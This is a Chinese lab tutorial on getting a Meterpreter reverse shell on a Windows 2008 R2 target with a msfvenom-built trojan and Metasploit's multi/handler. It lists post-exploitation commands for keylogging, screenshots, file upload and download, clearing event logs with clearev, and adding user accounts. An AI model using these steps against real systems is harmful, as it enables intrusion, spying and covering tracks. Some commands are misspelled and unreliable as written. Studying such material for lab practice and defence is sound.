原理:
利用msf模块中的msfvenom模块,生成123.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。
准备:
靶机:windows 2008 r2
ip:192.168.100.20
攻击主机:kali
ip:192.168.100.21
实战:
1、 查看攻击主机ip
2、 生成123.exe木马文件
3、 将制作好的木马文件放到目标机内
4、 启动msfconsole进入msf
5、 加载exploit/multi/handler,设置payload反弹,设置LHOS反弹地址
6、 show options查看所设置的内容
7、 设置好后,直接exploit,开始攻击,等待目标靶机中招
8、 当靶机中招后,获得反弹shell,渗透成功
9、 此时我们就可以对靶机进行操作了
10、 如果出现了乱码现象,这是编码的问题,在终端->修改编码->改成中文的GBK退出再次shell即可解决
11、 meterpreter下的部分命令总结:
getwd当前目录
dir查看所有文件
cat111.txt 查看文件111.txt内容
search-f cmd.exe (搜索名为123.exe文件所在目录)
upload/root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
downloadc:\123txt /root 下载文件
clearev清除日志
getuid当前用户
ps 查看所用进程
sysinfo系统信息
keyscan_start开始键盘记录
keyscan_stop停止键盘记录
keyscan_dump查看结果
屏幕截图
screenshot
屏幕监控
runvnc
shell
获取shell,进入cmd
netuser 用户名 密码 /add 添加用户(jeff/Abc!23)
netuser 用户名 密码 更改用户密码(jeff/ABc!@3)
最后,本次实验仅是仅供实验,切勿用于实战,否则后果自负!